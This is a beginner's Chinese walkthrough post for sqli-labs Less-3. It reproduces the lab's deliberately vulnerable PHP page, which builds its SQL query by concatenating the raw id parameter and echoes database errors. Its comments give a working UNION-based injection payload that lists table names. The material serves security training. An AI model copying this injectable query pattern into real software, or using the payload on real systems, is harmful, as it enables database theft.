sqlilabs(SQL注入)小白通基础通关笔记(专针对小白)(第三关Less-3)

Posted .白菜白菜大白菜.

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqlilabs(SQL注入)小白通基础通关笔记(专针对小白)(第三关Less-3)相关的知识,希望对你有一定的参考价值。

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-3 Error Based- String (with Twist) </title>

</head>

<body bgcolor="#000000">

<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
//与第一关相比多了括号,我们解决的方法就是id=1')解释'去去掉的是'半个括号去掉的是()
//相当于解析http://127.0.0.1/sqli-labs/Less-1/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
//在sql中的意思是:SELECT * FROM users WHERE id=('-1') (直接去掉阻碍)union select(链接后面语句)(如果不懂1,2,3是什么意思的话请看sqlilabs第一关) 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+') LIMIT 0,1
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo "<font size='5' color= '#99FF00'>";
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>


</font> </div></br></br></br><center>
<img src="../images/Less-3.jpg" /></center>
</body>
</html>

以上是关于sqlilabs(SQL注入)小白通基础通关笔记(专针对小白)(第三关Less-3)的主要内容,如果未能解决你的问题,请参考以下文章

sqlilabs(SQL注入)小白通基础通关笔记(专针对小白)(第五关Less-5)

sqlilabs(SQL注入)小白通基础通关笔记(专针对小白)(第一关Less-1)

sqlilabs(SQL注入)小白通基础通关笔记(专针对小白)(第四关Less-4)

sqlilabs(SQL注入)小白通基础通关笔记(专针对小白)(第三关Less-3)

sqlilabs(SQL注入)小白通基础通关笔记(专针对小白)(第二关Less-2)

sqlilabs(SQL注入)小白通基础通关笔记(专针对小白)(第七关Less-7)